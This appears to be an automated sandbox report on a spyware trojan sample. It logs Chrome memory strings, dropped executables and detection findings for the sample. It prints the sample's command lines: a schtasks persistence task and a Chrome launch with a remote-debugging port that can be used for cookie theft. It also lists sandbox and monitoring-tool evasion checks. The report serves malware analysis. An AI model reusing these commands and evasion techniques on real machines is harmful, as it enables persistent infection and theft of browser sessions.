Source: chrome.exe, 00000004.00000003.1751968750.00000A7402D00000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.1751553970.00000A7402594000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.1751834333.00000A7403320000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://photos.google.com?referrer=CHROME_NTP
Source: chrome.exe, 00000004.00000002.1771379252.00000A7402BB0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://policies.google.com/
Source: chrome.exe, 00000004.00000002.1761871452.00000A740228C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://safebrowsing.google.com/safebrowsing/clientreport/chrome-sct-auditing
Source: chrome.exe, 00000004.00000002.1761934405.00000A74022A8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://sctauditing-pa.googleapis.com/v1/knownscts/length/$1/prefix/$2?key=AIzaSyBOti4mM-6x9WDnZIjIe
Source: chrome.exe, 00000004.00000002.1762402971.00000A74023C4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://securitydomain-pa.googleapis.com/v1/
Source: chrome.exe, 00000004.00000002.1763824051.00000A74026C0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.1776400938.00000A7403304000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.1768675687.00000A74029B0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.1768795619.00000A74029D0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://sites.google.com/u/0/create?usp=chrome_actions
Source: chrome.exe, 00000004.00000002.1763824051.00000A74026C0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.1776400938.00000A7403304000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.1768675687.00000A74029B0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.1768795619.00000A74029D0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://sites.google.com/u/0/create?usp=chrome_actionsactions
Source: chrome.exe, 00000004.00000002.1771625563.00000A7402BF8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://t0.gstatic.com/faviconV2
Source: chrome.exe, 00000004.00000002.1762402971.00000A74023C4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://tasks.googleapis.com/
Source: chrome.exe, 00000004.00000002.1763681508.00000A7402688000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.ecosia.org/newtab/
Source: chrome.exe, 00000004.00000002.1772574203.00000A7402E5C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.ecosia.org/search?q=
Source: chrome.exe, 00000004.00000002.1772574203.00000A7402E5C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.ecosia.org/search?q=&addon=opensearch
Source: chrome.exe, 00000004.00000002.1772574203.00000A7402E5C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.ecosia.org/search?q=&addon=opensearchn=opensearch
Source: chrome.exe, 00000004.00000002.1765473641.00000A740282C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.1767194011.00000A7402918000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com
Source: chrome.exe, 00000004.00000002.1772772540.00000A7402EC8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.1766234146.00000A74028EC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/
Source: chrome.exe, 00000004.00000002.1769155942.00000A7402A0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.1772273964.00000A7402DCC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/Char
Source: chrome.exe, 00000004.00000002.1776400938.00000A7403304000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/async/ddljson?async=ntp:2
Source: chrome.exe, 00000004.00000002.1776265970.00000A7403254000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.1776616810.00000A74033C4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/async/newtab_ogb?hl=en-US&async=fixed:0
Source: chrome.exe, 00000004.00000002.1774367316.00000A7402F84000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.1768875911.00000A74029F0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.1771104488.00000A7402B70000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.1762402971.00000A74023C4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/chrome/tips/
Source: chrome.exe, 00000004.00000002.1774367316.00000A7402F84000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.1768875911.00000A74029F0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.1771104488.00000A7402B70000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.1762402971.00000A74023C4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/chrome/tips/gs
Source: chrome.exe, 00000004.00000002.1769915116.00000A7402A88000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=
Source: chrome.exe, 00000004.00000002.1764330979.00000A7402778000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.1772605630.00000A7402E6C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.1764025751.00000A74026F4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: chrome.exe, 00000004.00000002.1764330979.00000A7402778000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.icoenterInsightsex
Source: chrome.exe, 00000004.00000003.1751834333.00000A7403320000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/search?q=$
Source: chrome.exe, 00000004.00000002.1763824051.00000A74026C0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/tools/feedback/chrome/__submit
Source: chrome.exe, 00000004.00000002.1771690733.00000A7402C0C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/undo
Source: chrome.exe, 00000004.00000002.1761663315.00000A740221C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.googleapis.com/
Source: chrome.exe, 00000004.00000002.1762475459.00000A740240C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.googleapis.com/oauth2/v1/userinfo
Source: chrome.exe, 00000004.00000002.1762475459.00000A740240C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.googleapis.com/oauth2/v2/tokeninfo
Source: chrome.exe, 00000004.00000002.1764566259.00000A74027D0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.1762475459.00000A740240C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.googleapis.com/oauth2/v4/token
Source: chrome.exe, 00000004.00000002.1765533076.00000A7402864000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.1762475459.00000A740240C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.googleapis.com/reauth/v1beta/users/
Source: chrome.exe, 00000004.00000002.1763824051.00000A74026C0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.gstatic.com/chrome/intelligence/assist/ranker/models/translate/2017/03/translate_ranker_
Source: chrome.exe, 00000004.00000002.1764104940.00000A7402735000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/:
Source: chrome.exe, 00000004.00000002.1764104940.00000A7402735000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/?feature=ytca
Source: chrome.exe, 00000004.00000002.1764104940.00000A7402735000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/J
Source: chrome.exe, 00000004.00000002.1764104940.00000A7402735000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.1762723950.00000A74024C0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/s/notifications/manifest/cr_install.html
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49700
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49796
Source: unknown Network traffic detected: HTTP traffic on port 49804 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49796 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49700 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49805 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49805
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49804

System Summary
barindex
Drops large PE files
Source: C:\Users\user\Desktop\kFrGefsAK3.exe File dump: service123.exe.1.dr 314617856 Jump to dropped file
PE file contains section with special chars
Source: kFrGefsAK3.exe Static PE information: section name:
Source: kFrGefsAK3.exe Static PE information: section name: .idata
Source: kFrGefsAK3.exe Static PE information: section name:
Abnormal high CPU Usage
Source: C:\Users\user\Desktop\kFrGefsAK3.exe Process Stats: CPU usage > 49%
Detected potential crypto function
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 16_2_00A951B0 16_2_00A951B0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 16_2_00A93E20 16_2_00A93E20
One or more processes crash
Source: C:\Users\user\Desktop\kFrGefsAK3.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7660 -s 1152
Uses 32bit PE files
Source: kFrGefsAK3.exe Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED
Source: kFrGefsAK3.exe Static PE information: Section: aqvtbplo ZLIB complexity 0.9946345058056193
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@23/7@17/5
Source: C:\Users\user\Desktop\kFrGefsAK3.exe File created: C:\Users\user\AppData\Local\fHjWqgTqEM Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7660
Source: C:\Users\user\Desktop\kFrGefsAK3.exe Mutant created: \Sessions\1\BaseNamedObjects\My_mutex
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6564:120:WilError_03
Source: C:\Users\user\Desktop\kFrGefsAK3.exe File created: C:\Users\user~1\AppData\Local\Temp\service123.exe Jump to behavior
Source: C:\Users\user\Desktop\kFrGefsAK3.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: C:\Users\user\Desktop\kFrGefsAK3.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\Desktop\kFrGefsAK3.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\Desktop\kFrGefsAK3.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\Desktop\kFrGefsAK3.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\Desktop\kFrGefsAK3.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\Desktop\kFrGefsAK3.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\Desktop\kFrGefsAK3.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: chrome.exe, 00000004.00000002.1764104940.00000A7402735000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: CREATE TABLE psl_extensions (domain VARCHAR NOT NULL, UNIQUE (domain));
Source: kFrGefsAK3.exe Virustotal: Detection: 58%
Source: kFrGefsAK3.exe ReversingLabs: Detection: 60%
Source: unknown Process created: C:\Users\user\Desktop\kFrGefsAK3.exe "C:\Users\user\Desktop\kFrGefsAK3.exe"
Source: C:\Users\user\Desktop\kFrGefsAK3.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9222 --profile-directory="Default"
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2404 --field-trial-handle=2284,i,17304781938837466691,17340018191184435159,262144 /prefetch:8
Source: C:\Users\user\Desktop\kFrGefsAK3.exe Process created: C:\Users\user\AppData\Local\Temp\service123.exe "C:\Users\user\AppData\Local\Temp\service123.exe"
Source: C:\Users\user\Desktop\kFrGefsAK3.exe Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /tn "ServiceData4" /tr "C:\Users\user~1\AppData\Local\Temp\/service123.exe" /st 00:01 /du 9800:59 /sc once /ri 1 /f
Source: C:\Windows\SysWOW64\schtasks.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\kFrGefsAK3.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7660 -s 1152
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\service123.exe C:\Users\user~1\AppData\Local\Temp\/service123.exe
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\service123.exe C:\Users\user~1\AppData\Local\Temp\/service123.exe
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\service123.exe C:\Users\user~1\AppData\Local\Temp\/service123.exe
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\service123.exe
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\service123.exe
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\service123.exe
Source: C:\Users\user\Desktop\kFrGefsAK3.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9222 --profile-directory="Default" Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2404 --field-trial-handle=2284,i,17304781938837466691,17340018191184435159,262144 /prefetch:8 Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Users\user\Desktop\kFrGefsAK3.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\Desktop\kFrGefsAK3.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\Desktop\kFrGefsAK3.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\Desktop\kFrGefsAK3.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\Desktop\kFrGefsAK3.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Users\user\Desktop\kFrGefsAK3.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Users\user\Desktop\kFrGefsAK3.exe Section loaded: dhcpcsvc6.dll Jump to behavior
Source: C:\Users\user\Desktop\kFrGefsAK3.exe Section loaded: dhcpcsvc.dll Jump to behavior
Source: C:\Users\user\Desktop\kFrGefsAK3.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Users\user\Desktop\kFrGefsAK3.exe Section loaded: napinsp.dll Jump to behavior
Source: C:\Users\user\Desktop\kFrGefsAK3.exe Section loaded: pnrpnsp.dll Jump to behavior
Source: C:\Users\user\Desktop\kFrGefsAK3.exe Section loaded: wshbth.dll Jump to behavior
Source: C:\Users\user\Desktop\kFrGefsAK3.exe Section loaded: nlaapi.dll Jump to behavior
Source: C:\Users\user\Desktop\kFrGefsAK3.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\Desktop\kFrGefsAK3.exe Section loaded: winrnr.dll Jump to behavior
Source: C:\Users\user\Desktop\kFrGefsAK3.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\Desktop\kFrGefsAK3.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\Desktop\kFrGefsAK3.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\Desktop\kFrGefsAK3.exe Section loaded: windowscodecs.dll Jump to behavior
Source: C:\Users\user\Desktop\kFrGefsAK3.exe Section loaded: napinsp.dll Jump to behavior
Source: C:\Users\user\Desktop\kFrGefsAK3.exe Section loaded: pnrpnsp.dll Jump to behavior
Source: C:\Users\user\Desktop\kFrGefsAK3.exe Section loaded: wshbth.dll Jump to behavior
Source: C:\Users\user\Desktop\kFrGefsAK3.exe Section loaded: nlaapi.dll Jump to behavior
Source: C:\Users\user\Desktop\kFrGefsAK3.exe Section loaded: winrnr.dll Jump to behavior
Source: C:\Users\user\Desktop\kFrGefsAK3.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\Desktop\kFrGefsAK3.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Users\user\Desktop\kFrGefsAK3.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Users\user\Desktop\kFrGefsAK3.exe Section loaded: rstrtmgr.dll Jump to behavior
Source: C:\Users\user\Desktop\kFrGefsAK3.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Users\user\Desktop\kFrGefsAK3.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Users\user\Desktop\kFrGefsAK3.exe Section loaded: dpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe Section loaded: cahnbeclrgcbxnsvhjfx.dll Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: taskschd.dll Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: xmllite.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe Section loaded: cahnbeclrgcbxnsvhjfx.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe Section loaded: cahnbeclrgcbxnsvhjfx.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe Section loaded: cahnbeclrgcbxnsvhjfx.dll Jump to behavior
Source: kFrGefsAK3.exe Static file information: File size 4464128 > 1048576
Source: kFrGefsAK3.exe Static PE information: Raw size of is bigger than: 0x100000 < 0x28a000
Source: kFrGefsAK3.exe Static PE information: Raw size of aqvtbplo is bigger than: 0x100000 < 0x1b4000
Contains functionality to dynamically determine API calls
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 16_2_00A981E0 LoadLibraryA,GetProcAddress,FreeLibrary,GetLastError,FreeLibrary, 16_2_00A981E0
Entry point lies outside standard sections
Source: initial sample Static PE information: section where entry point is pointing to: .taggant
PE file contains an invalid checksum
Source: kFrGefsAK3.exe Static PE information: real checksum: 0x44d1c9 should be: 0x45190e
PE file contains sections with non-standard names
Source: kFrGefsAK3.exe Static PE information: section name:
Source: kFrGefsAK3.exe Static PE information: section name: .idata
Source: kFrGefsAK3.exe Static PE information: section name:
Source: kFrGefsAK3.exe Static PE information: section name: aqvtbplo
Source: kFrGefsAK3.exe Static PE information: section name: fixzxdaf
Source: kFrGefsAK3.exe Static PE information: section name: .taggant
Source: service123.exe.1.dr Static PE information: section name: .eh_fram
Source: CaHNbeclRGcBxNSvHjFX.dll.1.dr Static PE information: section name: .eh_fram
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 16_2_00A9A499 push es; iretd 16_2_00A9A694
Source: kFrGefsAK3.exe Static PE information: section name: aqvtbplo entropy: 7.955432588000684
Drops PE files
Source: C:\Users\user\Desktop\kFrGefsAK3.exe File created: C:\Users\user\AppData\Local\Temp\CaHNbeclRGcBxNSvHjFX.dll Jump to dropped file
Source: C:\Users\user\Desktop\kFrGefsAK3.exe File created: C:\Users\user\AppData\Local\Temp\service123.exe Jump to dropped file

Boot Survival
barindex
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Source: C:\Users\user\Desktop\kFrGefsAK3.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\Desktop\kFrGefsAK3.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\Desktop\kFrGefsAK3.exe Window searched: window name: RegmonClass Jump to behavior
Source: C:\Users\user\Desktop\kFrGefsAK3.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\Desktop\kFrGefsAK3.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\Desktop\kFrGefsAK3.exe Window searched: window name: Regmonclass Jump to behavior
Source: C:\Users\user\Desktop\kFrGefsAK3.exe Window searched: window name: Filemonclass Jump to behavior
Source: C:\Users\user\Desktop\kFrGefsAK3.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Uses schtasks.exe or at.exe to add and modify task schedules
Source: C:\Users\user\Desktop\kFrGefsAK3.exe Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /tn "ServiceData4" /tr "C:\Users\user~1\AppData\Local\Temp\/service123.exe" /st 00:01 /du 9800:59 /sc once /ri 1 /f
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion
barindex
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Source: C:\Users\user\Desktop\kFrGefsAK3.exe File opened: HKEY_CURRENT_USER\Software\Wine Jump to behavior
Source: C:\Users\user\Desktop\kFrGefsAK3.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Jump to behavior
